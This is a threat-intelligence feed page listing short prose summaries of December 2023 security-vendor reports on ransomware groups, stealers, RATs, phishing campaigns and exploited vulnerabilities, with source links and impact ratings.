https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web
—
- Intel Source:
- SOC Radar
- Intel Name:
- Diving_Deep_into_Cactus_Ransomware
- Date of Scan:
- 2024-01-02
- Impact:
- LOW
- Summary:
- Since its discovery in March 2023, the Cactus Ransomware Group has quickly expanded throughout the digital sphere, taking use of flaws in VPNs in particular to obtain access without authorization and establish a presence on compromised systems. The organization has proven to have a deep understanding of evasion strategies by using a dynamic approach to encryption and a variety of tools and procedures to ensure the efficient and discrete delivery of its malicious payload.
Source:
https://socradar.io/dark-web-profile-cactus-ransomware/
—
- Intel Source:
- Microsoft
- Intel Name:
- Microsoft_Stops_MSIX_Protocol_Handler_Used_Maliciously
- Date of Scan:
- 2023-12-29
- Impact:
- MEDIUM
- Summary:
- After several financially motivated threat groups used the MSIX ms-appinstaller protocol handler to infect Windows users with malware, Microsoft disabled it once more. In order to get around security measures that would normally shield Windows users from malware, such as the Defender SmartScreen anti-phishing and anti-malware component and built-in browser alerts warning users against downloading executable files, the attackers took advantage of the CVE-2021-43890 Windows AppX Installer spoofing vulnerability.
—
- Intel Source:
- SANS
- Intel Name:
- A_Glimpse_into_DShield_Honeypot_Activity
- Date of Scan:
- 2023-12-28
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have discovered a disruptive malware strain called Mirai, which has caused havoc since it was discovered. It takes advantage of security flaws in IoT devices and turns them into a “botnet,” or network of bots, that can be used to launch massive network attacks.
—
- Intel Source:
- CERT UA
- Intel Name:
- A_Domain_Controller_is_Threatened_Within_an_Hour_of_Attack
- Date of Scan:
- 2023-12-28
- Impact:
- MEDIUM
- Summary:
- Following an investigation by CERT-UA researchers into an incident, it was discovered that the aforementioned links take the victim to a webpage where, using JavaScript and features of the application protocol “search” (“ms-search”), a shortcut file is downloaded, which when opened, causes the launch of A PowerShell script created to launch (open) a spoof document and download it from a remote (SMB) resource, together with the Python interpreter and the Client.py file marked as MASEPIE.
—
- Intel Source:
- ASEC
- Intel Name:
- Trend_Analysis_of_Kimsuky_Group_Attacks
- Date of Scan:
- 2023-12-28
- Impact:
- LOW
- Summary:
- Spear phishing attacks are a regular tactic used by the Kimsuky threat group to target South Korean users. Typically, the organization sends out malicious files that appear to be document attachments for emails. Users may not be able to operate their machine when they launch these attachments.
—
- Intel Source:
- Barracuda
- Intel Name:
- New_Zero_Day_in_Barracuda_s_ESG_Appliances
- Date of Scan:
- 2023-12-28
- Impact:
- LOW
- Summary:
- Barracuda posted that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy backdoors on a “limited number” of devices. It is assigned to CVE-2023-7102, the issue relates to a case of arbitrary code execution that resides within a third-party and open-source library named Spreadsheet::ParseExcel that’s used by the Amavis scanner within the gateway to screen Microsoft Excel email attachments for malware.
Source:
https://www.barracuda.com/company/legal/esg-vulnerability
https://thehackernews.com/2023/12/chinese-hackers-exploited-new-zero-day.html
—
- Intel Source:
- Cyble
- Intel Name:
- QBit_Stealer_s_source_code_malicious_feature
- Date of Scan:
- 2023-12-28
- Impact:
- LOW
- Summary:
- After analyzing qBit Stealer’s source code, the Cyble research team discovered a unique feature not like any other stealers, qBit selectively targets files with specific extensions. This characteristic implies its potential use as an exfiltration tool in ransomware operations.
Source:
https://cyble.com/blog/decoding-qbit-stealers-source-release-and-data-exfiltration-prowess/
—
- Intel Source:
- Barracuda
- Intel Name:
- Vulnerability_in_Barracuda_Email_Security_Gateway_Appliance
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- According to the findings of Barracuda experts’ ongoing investigation, a threat actor deployed a specially designed Excel email attachment to target a certain number of ESG devices by taking use of an Arbitrary Code Execution (ACE) vulnerability within a third-party library, Spreadsheet::ParseExcel.
Source:
https://www.barracuda.com/company/legal/esg-vulnerability
—
- Intel Source:
- Esentire
- Intel Name:
- Ande_Loader_and_SwaetRAT_analysis
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- This article analyzes the malicious payloads used by the PhantomControl threat actors. It explains the process of retrieving the base64-encoded data from the downloaded image, the parameters passed to the “VAI” method, and the core payload, SwaetRAT, written in .NET and has key logging capabilities. It also explains the ID generation algorithm, the commands handled by the ReadPacket class, and the creation of persistence via startup folders and process hollowing techniques. Finally, it provides a Yara rule on SwaetRAT and recommendations for protection.
Source:
https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat
—
- Intel Source:
- Security Intelligence
- Intel Name:
- Advanced_Web_Injection_Campaignu_unraveling_the_Tactics_of_a_Sophisticated_Threat
- Date of Scan:
- 2023-12-27
- Impact:
- MEDIUM
- Summary:
- In a recent analysis, IBM Security Trusteer has uncovered a sophisticated web injection campaign that utilizes JavaScript injections, impacting over 40 banks across North America, South America, Europe, and Japan. This malware, possibly linked to DanaBot, employs evasive techniques, including dynamic web injection, to compromise popular banking applications. The injected JavaScript targets specific pages within banks, aiming to intercept user credentials and potentially monetize banking information. The attackers purchased malicious domains in December 2022, initiating campaigns since early 2023. The web injection’s dynamic behavior, communication with a command and control server, and adaptability make it a significant threat to the security of financial institutions and their customers. Users are advised to remain vigilant, report suspicious activities, and follow best practices for security.
Source:
https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Threat_Actor_UAC_0099_continues_to_target_Ukraine
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- Threat actor ‘UAC-0099’ has been targeting Ukraine since mid-2022, using a fabricated court summons to bait targets, a RAR SFX with LNK infection vector, and a HTA infection vector. They have also exploited a WinRAR vulnerability, CVE-2023-38831. To reduce risk, monitoring and limiting PowerShell and scheduled tasks is recommended, as well as updating WinRAR. IOCs and POC for CVE-2023-38831 can be found on GitHub.
Source:
https://www.deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine
—
- Intel Source:
- thehackernews
- Intel Name:
- PikaBot_Malware_Spreads_via_Malvertising_Campaign_Targeting_AnyDesk_Users
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- Security researchers have uncovered a malvertising campaign spreading the PikaBot malware, particularly targeting users searching for legitimate software like AnyDesk. PikaBot, previously distributed through malspam campaigns, serves as a loader and backdoor, allowing unauthorized remote access to compromised systems. In this campaign, threat actors, including the notorious TA577, leverage malicious Google ads for AnyDesk that redirect victims to a fake website hosting a malicious MSI installer on Dropbox. The malvertising tactic involves bypassing Google’s security checks with a tracking URL via a legitimate marketing platform. The attack is reminiscent of malvertising chains previously observed with other loader malware, indicating a potential trend in “malvertising-as-a-service.” This discovery follows a surge in malicious ads through Google searches for popular software, indicating a growing threat in browser-based attacks.
Source:
https://thehackernews.com/2023/12/new-malvertising-campaign-distributing.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_spike_of_phishing_attacks_with_Crypto_drainers
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- This article examines the threat of phishing attacks with crypto drainers, which involve malicious smart contracts and deceptive websites to deceive users into giving away their tokens. It explains the Angel Drainer technique, a phishing attack that uses permit functions to transfer tokens without the user’s knowledge. Tips are provided on how to safeguard against these attacks.
Source:
https://research.checkpoint.com/2023/the-rising-threat-of-phishing-attacks-with-crypto-drainers/
—
- Intel Source:
- Fortinet
- Intel Name:
- Bandook_malware_behavior
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- FortiGuard Labs has discovered a new variant of the Bandook malware, a persistent remote access trojan (RAT) with origins dating back to 2007. This latest variant is distributed through a PDF file containing a shortened URL, leading to a password-protected .7z file. Upon extraction, the malware injects its payload into the msinfo32.exe process. The malware exhibits a refined injection process and establishes persistence through registry manipulation. The communication with its command and control (C2) server involves an array of commands, including file manipulation, information stealing, and control over the victim’s computer. FortiGuard Labs provides insights into the malware’s behavior and the added complexity in its latest variant, offering protections against the identified threats.
Source:
https://www.fortinet.com/blog/threat-research/bandook-persistent-threat-that-keeps-evolving
—
- Intel Source:
- Imperva
- Intel Name:
- 8220_Gang_Evolving_Tactics_Exploiting_Web_Servers
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- Imperva Threat Research uncovers new activity from the 8220 gang, a Chinese-origin threat group known for deploying cryptojacking malware on both Windows and Linux web servers. The blog details recent exploits, attack vectors, and indicators of compromise (IoCs), emphasizing the importance of patching and robust security measures for organizations. The group’s evolving tactics include exploiting vulnerabilities such as CVE-2021-44228, CVE-2017-3506, and CVE-2020-14883 to propagate malware, with Imperva providing mitigation through its Cloud WAF and on-prem WAF.
Source:
https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/
—
- Intel Source:
- Seqrite
- Intel Name:
- A_Sophisticated_Phishing_Campaign_Targeting_Indian_Government_Personnel
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- Operation RusticWeb is an advanced phishing campaign, active since October 2023, that specifically targets Indian government personnel, notably in the defense sector. The threat actors employ Rust-based payloads and encrypted PowerShell scripts for file system enumeration and exfiltration of confidential documents. Noteworthy tactics include the use of fake domains mimicking government entities, such as the Army Welfare Education Society (AWES) and the Department of Personnel & Training. The campaign, exhibiting similarities with known APT groups linked to Pakistan, reflects a shift towards newer programming languages like Rust.
—
- Intel Source:
- ASEC
- Intel Name:
- Analysis_of_SSH_Scanner_Malware_Attacks_on_Linux_Servers
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has conducted a detailed analysis of recent attack campaigns targeting poorly managed Linux SSH servers. In addition to commonly installed malware like DDoS bots and CoinMiners, threat actors are employing SSH scanner malware to extract valuable information, including IP addresses and SSH account credentials. This article outlines the attack flow, including the utilization of tools such as ShellBot, Tsunami, ChinaZ DDoS Bot, and XMRig CoinMiner.
—
- Intel Source:
- Sucuri
- Intel Name:
- MageCart_WordPress_Plugin_Injects_Malicious_stuff
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- A new strain of MageCart malware has been identified, targeting WordPress/WooCommerce e-commerce websites. The malware injects itself into the mu-plugins directory, concealing its presence and making removal challenging. Operating under the guise of a fake WordPress Cache Addons plugin, the malware goes to great lengths to avoid detection and removal, even restricting the use of file manager plugins. Notably, it creates a hidden administrator user account, providing attackers sustained access. The malware’s primary goal is credit card skimming, injecting sophisticated JavaScript into the website’s checkout page.
—
- Intel Source:
- Inflobox
- Intel Name:
- A_Comprehensive_Analysis_of_Phishing_Infrastructure_and_Tactics
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- The United States Postal Service (USPS) has become a prime target for a surge in SMS phishing attacks, colloquially known as smishing, since July. Chinese threat actors dominate this trend, utilizing a dark market toolkit to facilitate attacks on various messaging platforms and carriers. The toolkit’s ease of use and affordability have contributed to a notable increase in USPS-themed phishing campaigns. While previous reports have focused on specific campaigns, actors, or the toolkit itself, this analysis delves into a comprehensive examination of over 7,000 USPS-related domains, revealing distinct techniques, tactics, and procedures (TTPs) observable in the Domain Name System (DNS).
—
- Intel Source:
- Sophos
- Intel Name:
- Akira_ransomware_came_back
- Date of Scan:
- 2023-12-24
- Impact:
- MEDIUM
- Summary:
- There was an observation of some incidents involving Akira ransomware which has a big impact on different areas and countries. According to the evidence, Akira has primarily targeted organizations in Europe, North America, and Australia, and operates in the government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunication sectors.
Source:
https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/
—
- Intel Source:
- CERT-UA
- Intel Name:
- New_UAC_0050_attack_using_RemcosRAT
- Date of Scan:
- 2023-12-23
- Impact:
- MEDIUM
- Summary:
- Recently, the CERT-UA has observed the mass distribution of e-mails with the subject “Debts under the Kyivstar contract” and an attachment in the form of the “Subscriber debt.zip” archive.
—
- Intel Source:
- Trustwave
- Intel Name:
- HR_Themed_Spam_Emails
- Date of Scan:
- 2023-12-21
- Impact:
- LOW
- Summary:
- Trustwave provided their details on some recent campaigns that use HR-related themes, along with their context and a run-through of their attack flow.
—
- Intel Source:
- Netscope
- Intel Name:
- The_Nim_based_Campaign_Using_Microsoft_Word_Docs
- Date of Scan:
- 2023-12-21
- Impact:
- LOW
- Summary:
- Netskope did some analysis of a malicious backdoor written in Nim, which is a relatively new programming language. Their blog gives detailed analyses of a recent targeted threat that uses Word document bait to deliver a Nim backdoor.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Some_malware_clusters_spreads_via_email_and_fake_browser_updates
- Date of Scan:
- 2023-12-21
- Impact:
- LOW
- Summary:
- Recently It was observed that DarkGate remote access Trojan (RAT) was used by multiple cybercrime actors and was spread via many methods such as email, Microsoft Teams, Skype, malvertising, and fake updates. And the researchers provided details about the RogueRaticate and BattleRoyal fake update activity cluster fake update activity cluster.
—
- Intel Source:
- Intezer
- Intel Name:
- Operation_HamsaUpdate
- Date of Scan:
- 2023-12-21
- Impact:
- HIGH
- Summary:
- The Israel National Cyber Directorate alarmed a warning about a phishing campaign actively targeting Israeli customers using F5’s network devices. They named it this operation as an Operation HamsaUpdate. This campaign started the deployment of a newly developed wiper malware that targets both Windows and Linux servers.
Source:
https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/
—
- Intel Source:
- Security Intelligence
- Intel Name:
- Web_injections_are_on_the_rise
- Date of Scan:
- 2023-12-21
- Impact:
- LOW
- Summary:
- Security Intelligence researchers did deep analyses of the web injection utilized in the recent campaign, its evasive techniques, code flow, targets and the methods employed to achieve them. Analysts discovered that in this new campaign, threat actors’ intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users’ credentials in order to access then and likely monetize their banking information.
Source:
https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/
—
- Intel Source:
- Trustwave
- Intel Name:
- Instagram_Phishing_attacks
- Date of Scan:
- 2023-12-20
- Impact:
- LOW
- Summary:
- Trustwave researchers observed another campaign of Instagram “Copyright Infringement” phishing emails in their spam traps. In this new campaign, in addition, the threat actors also target to obtain the victim’s Instagram backup codes. This campaign is an enhanced version of what we reported on the SpiderLabs blog titled “Insta-Phish-A-Gram”.
—
- Intel Source:
- Zscaler
- Intel Name:
- Agent_Tesla_delivery
- Date of Scan:
- 2023-12-20
- Impact:
- LOW
- Summary:
- ZScaler analyzed Agent Tesla’s new tactics employed by threat actors to deploy Agent Tesla malware using CVE-2017-11882. Agent Tesla is an advanced keylogger with features like clipboard logging, screen key logging, screen capturing, and extracting stored passwords from web browsers.
—
- Intel Source:
- Symantec
- Intel Name:
- Seedworm_Iranian_Hackers_Target_Telecoms
- Date of Scan:
- 2023-12-20
- Impact:
- MEDIUM
- Summary:
- Iranian espionage group Seedworm (aka Muddywater) attacked telecom companies in Egypt, Sudan, and Tanzania. This group has been active since 2017 and attacked companies in many countries. It is believed to be a part of Iran’s Ministry of Intelligence and Security. The threat actors used a variety of tools in this activity. Researchers on Symantec’s Threat Hunter Team, part of Broadcom are investigating hacker activity and found a MuddyC2Go PowerShell launcher. The attackers also use the SimpleHelp remote access tool and Venom Proxy, which have previously been associated with Seedworm activity, as well as a custom key logging tool, and other publicly available and living-off-the-land tools.
—
- Intel Source:
- AT&T
- Intel Name:
- JaskaGO_malware_attacks_on_macOS_and_Windows
- Date of Scan:
- 2023-12-20
- Impact:
- MEDIUM
- Summary:
- AT&T Alien Labs has discovered a sophisticated malware stealer strain crafted in the Go programming language, impacting as a severe threat to both Windows and macOS operating systems.
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Two_novel_techniques_deployed_on_GitHub
- Date of Scan:
- 2023-12-20
- Impact:
- MEDIUM
- Summary:
- ReversingLabs researchers have uncovered two novel techniques running on GitHub — one abusing GitHub Gists, another issuing commands through git commit messages.
Source:
https://www.reversinglabs.com/blog/malware-leveraging-public-infrastructure-like-github-on-the-rise
—
- Intel Source:
- ReliaQuest
- Intel Name:
- Double_Extortion_Attack_Analysis
- Date of Scan:
- 2023-12-20
- Impact:
- LOW
- Summary:
- A couple of months ago, ReliaQuest detected some unknown process executions inside of the customer’s environment, originating from the Windows debug directory. The analysts’ analysis showed that these executions as part of a more significant cyber-threat incident that resulted in double extortion: the encryption of customer data, followed by ransomware deployment and a threat to release the data publicly.
Source:
https://www.reliaquest.com/blog/double-extortion-attack-analysis/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Malicious_JavaScript_samples_to_steal_sensitive_information
- Date of Scan:
- 2023-12-20
- Impact:
- LOW
- Summary:
- Unit 42 researchers have observed threat actors using malicious JavaScript samples to steal sensitive information by abusing popular survey sites, low-quality hosting, and web chat APIs. In some campaigns, attackers created chatbots that they registered to someone noteworthy such as an Australian footballer. Other malware campaigns had both web skimmers injected into compromised sites and traditional phishing sites.
Source:
https://unit42.paloaltonetworks.com/malicious-javascript-steals-sensitive-data/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Modus_operandi_UAC_0177_JokerDPR_attack
- Date of Scan:
- 2023-12-20
- Impact:
- MEDIUM
- Summary:
- The government of Ukraine CERT-UA investigated one of the incidents, information about which was published in a manipulative form on the Telegram channel JokerDPR. It was found that one of the methods of implementing cyber threats carried out by “followers” JokerDPR and/or the information about which is published in the mentioned channel, is conducting phishing attacks aimed at obtaining unauthorized access to the accounts of the mail services Google, Ukr.Net, Outlook, as well as the cryptocurrency exchanges EXMO and Binance.
—
- Intel Source:
- Cyberint
- Intel Name:
- Anonymous_Sudan_expansion
- Date of Scan:
- 2023-12-19
- Impact:
- LOW
- Summary:
- In December 2023 Cyberint detected that Anonymous Sudan claimed responsibility for disrupting the Discord login page in collaboration with SKYNET and GodzillaBotnet. This action stands among a series of recent collaborative attacks the groups executed.
Source:
https://cyberint.com/blog/research/anonymous-sudan-an-analysis/
—
- Intel Source:
- CISA
- Intel Name:
- The_Play_ransomware_group
- Date of Scan:
- 2023-12-19
- Impact:
- MEDIUM
- Summary:
- The FBI, CISA, and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a joint Cybersecurity Advisory (CSA), #StopRansomware: Play Ransomware, to disseminate Play ransomware group’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data, and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia.
—
- Intel Source:
- Any.Run
- Intel Name:
- Malware_Trends_Tracker
- Date of Scan:
- 2023-12-19
- Impact:
- LOW
- Summary:
- “Every day Any.Run researchers upload a lot of submissions to ANY.RUN sandbox, many of them with malicious verdicts. That’s why researchers created Malware Trends Tracker. They provide in their malware description malware history, recent samples, malware distribution method, malware execution video, detection process, global, week, and month ranks, IOCs – latest IP addresses, Hashes, domain names, URLs.
Source:
https://any.run/cybersecurity-blog/malware-statistics-and-trends/
—
- Intel Source:
- Trellix
- Intel Name:
- Cybercriminals_abuse_GitHub_tool_Predator
- Date of Scan:
- 2023-12-19
- Impact:
- LOW
- Summary:
- Trellix showed in their blog how cybercriminals have abused this GitHub tool Predator and how it has been used in multiple phishing campaigns with frequently changing url patterns in a very short span. Predator, a tool designed to combat bots and web crawlers, can distinguish web requests originating from automated systems, bots, or web crawlers.
—
- Intel Source:
- ASEC
- Intel Name:
- Ongoing_Exploitation_of_Apache_ActiveMQ_Vulnerability
- Date of Scan:
- 2023-12-19
- Impact:
- MEDIUM
- Summary:
- A recent blog post by AhnLab Security Emergency Response Center (ASEC) reveals that threat actors continue to exploit the Apache ActiveMQ vulnerability (CVE-2023-46604). The vulnerability, allowing remote code execution in the messaging and integration pattern server, has been targeted by various threat actors for deploying Ladon, NetCat, AnyDesk, and z0Miner.
—
- Intel Source:
- SANS
- Intel Name:
- Unearthing_a_Scripted_Assault_on_RocketMQ
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- Delving into the aftermath of the CVE-2023-33246 vulnerability in RocketMQ, this report spotlights a malicious Bash script discovered in the wild. Operating surreptitiously, the script dynamically creates an environment, installs dependencies, and leverages the masscan port scanner to identify vulnerable servers. Specifically targeting open ports associated with RocketMQ, the script then employs a Python counterpart for the actual exploitation
—
- Intel Source:
- Rewterz
- Intel Name:
- Kimsuky_threat_group_is_targeting_research_institutes_in_South_Korea
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- The North Korean state-backed threat group known as Kimsuky is targeting research institutes in South Korea with spear-phishing to infect the target systems with backdoor trojans and ultimately execute commands for stealing sensitive data.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Early_Detection_of_Malicious_Stockpiled_Domains
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- Palo Alto analysts described techniques used by cybercriminals evolved into domain wars.
Source:
https://unit42.paloaltonetworks.com/detecting-malicious-stockpiled-domains/
—
- Intel Source:
- Nsfocus
- Intel Name:
- Xorbot_Botnet_Family
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- NSFOCUS Global Threat system observed some elf file that was being widely spread by a large amount of suspected encrypted outbound communication traffic. But the detection engine did not detect it. After further deep analysis, it was identified as a novel botnet family with a deep hidden mystery. Given that the family uses multiple rounds of xor operations in encryption and decryption algorithms, NSFOCUS Research Labs named the Trojan xorbot.
Source:
https://nsfocusglobal.com/xorbot-a-stealthy-botnet-family-that-defies-detection/
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Sidewinder_group_cyber_intrusion_tactics
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- Cyfirma published their report which describes a recent threat actor’s campaign with a malicious Word document equipped with an embedded macro, unraveling a sophisticated cyber threat orchestrated by the Sidewinder group possibly to target Nepalese government officials. That threat started with a potentially spear-phished email delivering a malicious Word document. After downloading and upon opening the document, the embedded macro executes, manipulating victims into enabling macros.
—
- Intel Source:
- Seqrite
- Intel Name:
- BATLOADER_2_X_Threat_of_Stealthy_Malware_Tactics
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- Seqrite analysts analyzed an attack where Batloader loads the payload, and it is a stealer this time. Batloader is not a new malware in the series – it is an emerging one.
—
- Intel Source:
- Thedfirreport
- Intel Name:
- Unveiling_a_Year_of_Covert_Operations_Profiling_a_Stealthy_Threat_Actor
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- This report provides a unique analysis by exploring data from the perspective of a threat actor’s exposed host. Discovered in an open directory, the amassed data spans over a year, unveiling a historical narrative of the threat actor’s operations. While primarily non-financially motivated, the actor strategically targeted an array of sectors, including government, defense contractors, finance, critical infrastructure, telecommunications, and escort services. Operating exclusively with open-source tools, the threat actor demonstrated a diverse skill set, employing active scanning, reconnaissance, and targeted exploits.
—
- Intel Source:
- sophos
- Intel Name:
- Pig_Butchering_Scams_Deep_Dive_into_Cryptocurrency_Confidence_Schemes
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- Cryptocurrency-based crime, particularly “pig butchering” scams, has evolved into sophisticated confidence schemes. Perpetrators use dating apps to establish relationships, leveraging generative AI to craft convincing messages. Investigating these scams reveals a complex web of interconnected domains and contract wallets, with scams evolving to avoid detection. The study unveils a multimillion-dollar network, emphasizing the need for public awareness and vigilance against the maturing tactics employed by organized crime rings in the cryptocurrency space.
Source:
https://news.sophos.com/en-us/2023/12/18/luring-with-love-defi-mining-scam-indepth/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- PikaBot_distributed_via_malicious_search_ads
- Date of Scan:
- 2023-12-15
- Impact:
- LOW
- Summary:
- Recently, researchers have noticed PikaBot, a new malware family that first showed up at the beginning of 2023, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns similar to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577.
Source:
https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads
—
- Intel Source:
- Resecurity
- Intel Name:
- The_BianLian_White_Rabbit_and_Mario_ransomware_gangs_collaboration
- Date of Scan:
- 2023-12-15
- Impact:
- MEDIUM
- Summary:
- A ransomware attack on a financial services firm in the APAC region used tactics such as password spraying, BEC emails, and compromised third-party accounts. Evidence suggests the attack was conducted by a trinity of ransomware gangs, White Rabbit, Mario, and Ransomhouse, who threatened to report the victim to regulators if they failed to pay the ransom. The attack further highlights the vulnerability of VPNs to ransomware attackers.
—
- Intel Source:
- Trustwave
- Intel Name:
- Honeypot_Recon_for_MySQL_Malware_Infection
- Date of Scan:
- 2023-12-15
- Impact:
- LOW
- Summary:
- Trustwave took a closer look at the infection mechanisms to get a better picture of this process. They recently surfaced in MySQL servers, leveraging SQL commands to infiltrate stealthily, deploy, and activate malicious payloads. And how they are constantly evolving, changing behavior, and adjusting infection techniques.
—
- Intel Source:
- Infoblox
- Intel Name:
- The_Lazarus_Group_Releases_KandyKorn
- Date of Scan:
- 2023-12-15
- Impact:
- MEDIUM
- Summary:
- KandyKorn is a highly sophisticated and dangerously formidable remote access trojan (RAT). Lazarus Group’s use of the KandyKorn malware tool highlights the group’s continued build-out of sophisticated tools and the growing dangers of their cyberattacks. Infoblox shared in their blog that threat actors have refined their techniques, causing most of the potential damage before malicious domains are identified and shared through open-source intelligence (OSINT) and the majority of commercial threat intel feeds.
Source:
https://blogs.infoblox.com/cyber-threat-intelligence/dns-for-early-detection-lazarus-kandykorn/
—
- Intel Source:
- Securelist
- Intel Name:
- NKAbuse_a_new_multiplatform_threat
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- Securelist discovered a new multiplatform threat “NKAbuse”. The malware using NKN technology for data exchange and backdoor capabilities. Their analysis assume that the main target of NKAbuse is Linux desktops. But possible is to infect MISP and ARM systems and could poses a threat to IoT devices.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- OilRig_persistent_attacks
- Date of Scan:
- 2023-12-14
- Impact:
- MEDIUM
- Summary:
- Researchers from Welivesecurity have analyzed a growing series of downloaders used by the OilRig cyber espionage group to maintain access to Israeli targets of special interest, in their blogpost published on 14 December 2023.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Recent_Gaza_Cybergang_activities
- Date of Scan:
- 2023-12-14
- Impact:
- MEDIUM
- Summary:
- SentinelLabs’ analysis reinforces the suspected ties between Gaza Cybergang and WIRTE, historically considered a distinct cluster with loose relations to the Gaza Cybergang.
Source:
https://www.sentinelone.com/labs/gaza-cybergang-unified-front-targeting-hamas-opposition/
—
- Intel Source:
- Checkpoint
- Intel Name:
- RHADAMANTHYS_V_0_5_0
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- Check Point Research team provided in their analysis a detailed view of agent modules, presenting their capabilities and implementation, focusing on how the stealer components are loaded and how they work. Rhadamanthys is an information stealer with a diverse set of modules and an interesting multilayered design.
Source:
https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/
—
- Intel Source:
- Lumen
- Intel Name:
- KV_Botnet_Investigation
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- The Black Lotus Labs team at Lumen Technologies is tracking a small office/home office (SOHO) router botnet that forms a covert data transfer network for advanced threat actors. They called this KV-botnet. The campaign infects devices at the edge of networks, a segment that has emerged as a soft spot in the defensive array of many enterprises.
Source:
https://blog.lumen.com/routers-roasting-on-an-open-firewall-the-kv-botnet-investigation/
—
- Intel Source:
- Group-IB
- Intel Name:
- GambleForce_campaign_carries_SQL_injection_attacks
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- Group-IB’s Threat Intelligence team observed since September 2023 that GambleForce threat actor has targeted more than 20 websites (government, gambling, retail, and travel) in Australia, China, Indonesia, the Philippines, India, South Korea, Thailand, and Brazil. After doing their deep analyses and the toolset in more detail, the analysts concluded that the tools were most likely associated with a threat actor executing one of the oldest attack methods: SQL injections.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_discovered_cluster_of_malicious_Python_projects
- Date of Scan:
- 2023-12-14
- Impact:
- LOW
- Summary:
- ESET Research discovered 116 malicious packages in PyPI, the official repository of software for the Python programming language, uploaded in 53 projects. The malware delivers a backdoor capable of remote command execution, exfiltration, and taking screenshots. The backdoor component is implemented for both Windows, in Python, and Linux, in Go.
Source:
https://www.welivesecurity.com/en/eset-research/pernicious-potpourri-python-packages-pypi/
—
- Intel Source:
- Seqrite
- Intel Name:
- Unraveling_Cerber_Ransomware
- Date of Scan:
- 2023-12-13
- Impact:
- MEDIUM
- Summary:
- This analysis delves into the intricacies of Cerber ransomware, a malicious software identified in 2016. Cerber employs advanced techniques, such as custom-packing its payload, using mutex validation to prevent reinfection, and configuring Windows firewall rules for evading security tools. The ransomware communicates through a specific protocol, employs RSA and RC4 algorithms for encryption, and employs a self-deletion mechanism post-infection. To safeguard against Cerber and similar threats, the analysis recommends precautionary measures, including regular data backups, software updates, strong password usage, and vigilant email practices.
—
- Intel Source:
- securelist
- Intel Name:
- FakeSG_RAT_Campaign_Akira_Ransomware_and_AMOS_Stealer_Insights
- Date of Scan:
- 2023-12-13
- Impact:
- MEDIUM
- Summary:
- Explore the dynamic landscape of crimeware through a detailed examination of three distinct threats: the FakeSG campaign utilizing NetSupport RAT, the Akira ransomware affecting both Windows and Linux environments, and the AMOS stealer targeting macOS users. Delve into the FakeSG campaign’s deceptive browser update tactics, Akira’s sophisticated ransomware techniques resembling Conti, and the AMOS stealer’s evolution from Go to C language.
Source:
https://securelist.com/crimeware-report-fakesg-akira-amos/111483/
—
- Intel Source:
- Stairwell
- Intel Name:
- Kuiper_ransomware_analysis
- Date of Scan:
- 2023-12-13
- Impact:
- LOW
- Summary:
- At the beginning of this month, Stairwell researchers got a copy of a server that was suspected operated by the developers of the Kuiper ransomware. Their report will have an overview of Stairwell researcher’s findings and a technical analysis of the ransomware.
Source:
https://stairwell.com/resources/kuiper-ransomware-analysis-stairwells-technical-report/
—
- Intel Source:
- Malwarebytes
- Intel Name:
